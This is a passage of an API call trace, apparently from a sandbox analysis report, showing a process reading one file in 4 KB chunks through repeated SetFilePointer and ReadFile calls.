hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.134] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x66000 [0081.134] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.134] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x67000 [0081.134] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.135] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x68000 [0081.135] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.135] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x69000 [0081.135] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.136] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6a000 [0081.136] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6b000 [0081.137] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6c000 [0081.137] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6d000 [0081.138] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.138] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6e000 [0081.138] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.138] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6f000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.139] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x70000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.139] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x71000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x72000 [0081.141] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x73000 [0081.141] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x74000 [0081.142] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.142] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x75000 [0081.142] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.142] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x76000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.143] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x77000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.143] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x78000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.144] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x79000 [0081.144] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.145] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7a000 [0081.145] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.145] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7b000 [0081.145] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.146] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7c000 [0081.146] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.146] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7d000 [0081.146] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7e000 [0081.147] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7f000 [0081.147] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.148] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x80000 [0081.148] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.150] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x81000 [0081.151] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.151] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x82000 [0081.151] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x83000 [0081.152] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x84000 [0081.152] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x85000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.153] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x86000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.153] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x87000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x88000 [0081.154] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.155] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x89000 [0081.155] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.155] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8a000 [0081.155] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8b000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8c000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8d000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8e000 [0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8f000 [0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x90000 [0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x91000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x92000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x93000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.160] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x94000 [0081.160] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.160] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x95000 [0081.160] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x96000 [0081.161] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x97000 [0081.161] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.162] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x98000 [0081.162] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.163] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x99000 [0081.163] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9a000 [0081.164] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.180] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9b000 [0081.180] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.180] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9c000 [0081.180] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 